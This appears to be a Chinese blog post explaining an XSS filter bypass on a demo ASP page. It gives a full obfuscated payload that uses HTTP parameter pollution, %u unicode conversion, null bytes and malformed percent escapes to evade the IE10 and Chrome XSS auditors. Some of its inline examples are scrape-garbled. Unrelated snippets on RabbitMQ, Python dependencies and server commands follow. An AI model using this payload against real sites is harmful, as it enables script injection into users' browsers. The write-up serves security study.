inputs:
- get: ?input1=somethinginput1=111
view-source:&input1=222
inputs:
- get: ?input1=somethinginput1=111, 222
這種情況下,構造乙個xss
inputs:
- get: ?input1=somethinginput1=
經過測試,繞過了ie 10的xss檢測,而沒有繞過chrome的
---------------------------
www.sdl.me/xssdemo/getxss.asp?input1=
inputs:
- get: ?input1=somethinginput1=
繞過了chrome,ie10.
通繞xss1 xss2的方案:
<1&input2=0
%3c1&input2=0%3cale%%rt(/awesome_irsdl/&in%u2119u%%t2%00%00%0%%0%00%0%%0=1);1&in%u2119ut%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&i%%n%%put2%00%00%00=1/%%*%%/&in%%p%%ut2=1/%%/
原理:1,asp特性,http引數汙染[http parameter pollution (hpp)]:asp允許對同一引數傳遞多次值。如上例中。
2,utf-8字元會被轉ascii字元,在引數名和值中都有效。比如,「input1=」 等價於 「%u0131n%u2119ut1=%u3008scr%u0131%u2119t>」
3,asp中引數名不區分大小寫,如,input1等價於input1
4,不管在引數名或值中,null後的值都被忽略。「input1=test」 等價於 「input1%00something=test%00anything」
5,在引數名或值中,%後如果不是有效的十六進製制,%會被忽略。
比如:「input1=test」 等價於 「%input1%=t%%est%」
6,在&後的引數名後如果不接=,asp不會將其作為一獨立引數。如,「?&input1=test」 引數名為&input1 值為test,「?&input1&input1=test」引數名為&input1&input1.
RabbitMQ的基本使用到高階特性
這裡需要增加乙個使用者,並且設定使用者為administrator,更多命令可以參考rabbitmq更多命令,這裡開始我本來是想用guest使用者,埠是 15672,但是在建立連線的時候是連線不上的,查資料後發現是必須開放5672埠,並且不能使用guest預設使用者 rabbitmqctl add ...
Python安裝一些包時用到的系統層面的依賴
注 以下解決方法均以centos7.3環境 已配置好可用yum源 為例,其他作業系統可能會有所區別。安裝cffi報錯 c cffi backend.c 15 17 fatal error ffi.h no such file or directory 解決 執行 yum install libffi...
遊戲伺服器更新時用到的一些命令
操作伺服器有一段時間了,經常對伺服器進行操作,整理備忘 tail f n 200 log 檢視200行log pwd 檢視當前路徑 find name value 根據檔名搜尋 許可權chmod 777 r 設定資料夾許可權 不要在根目錄使用只在需要的地方使用 sudo i 切換至root目錄 su...